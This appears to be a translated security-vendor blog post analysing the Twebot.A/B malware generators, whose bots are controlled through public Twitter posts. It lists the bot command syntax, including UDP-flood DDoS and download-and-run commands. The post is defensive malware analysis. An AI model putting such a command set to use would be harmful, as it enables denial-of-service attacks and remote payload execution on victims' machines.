Mobile admin, or twitter as a command center

    Managing botnets from a mobile phone has long been a reality - we have already seen cases of botnet management through jabber. And a few years ago, the IRC protocol was very popular with cybercriminals for these purposes. Last week, we were struck by the curious MSIL / Twebot.A bot generation program, which “links” them to the command center in the form of a twitter account through which all botnet management is carried out.


    Update:
    Added description of MSIL / Twebot.B.


    Controlling a botnet via twitter is not a new idea, and last summer it was already implemented as a concept , but in the present case, the authors went further and developed it into something more. The set of control commands is quite diverse:

    .VISIT (.VISIT * link.com *) - allows you to visit the specified URL. If at the end is 1, then the browser window will be visible, and if 0 - the window will be invisible.
    .DDOS (.DDOS * IP * PORT) - performs a UDP-flood attack on the specified address and port.
    .SAY (.SAY * any text) - allows you to pronounce the specified phrase on the controlled computer using Microsoft Text-To-Speech Engine technology.
    .DOWNLOAD(.DOWNLOAD * link.com / malware.exe *) - if it ends with 1, it downloads and runs the file at the specified URL, if 0 - the file does not start.
    .STOP - stops bots activity regardless of current tasks.
    .REMOVEALL - forces bots to stop any activity and not contact the command center until the next reboot.
    The bot generator is implemented on Visual Basic .NET and requires the installed .NET Framework to execute.

    image

    To counteract the reverse analysis, the bot generator and the generated bots themselves are obfuscated.

    image
    In the resource section of the bot generator, you can see interesting information that identifies the alias of the author Korrupt.

    image

    Even more interesting is the fact that in each generated bot there is a hard-wired @Korrupt account, which can also manage bots, despite the other command centers specified during generation.
    At the moment, the bot can only be attached to public twitter accounts, which are available in the search through the standard interface. Since commands are not masked at all, they are easy to spot.

    image
    Today, this is also some kind of concept, but with already clearly harmful potential. This approach to botnet management is convenient for attackers for many reasons, but the main thing is to disguise the bot as a twitter client and mobility.

    Update:
    Last night we got a new modification of this Trojan - MSIL / Twebot.B. This time, the author added the conclusion of a license agreement before launching the bot generator, in which he clearly makes it clear that the concept is in front of the user, and the developer is not responsible for its use.

    image

    Also, the author has largely redesigned the graphical interface of the bot generator. Now you can change much more parameters that are responsible for the interaction of the team center and the bot itself.

    image

    Also popular now: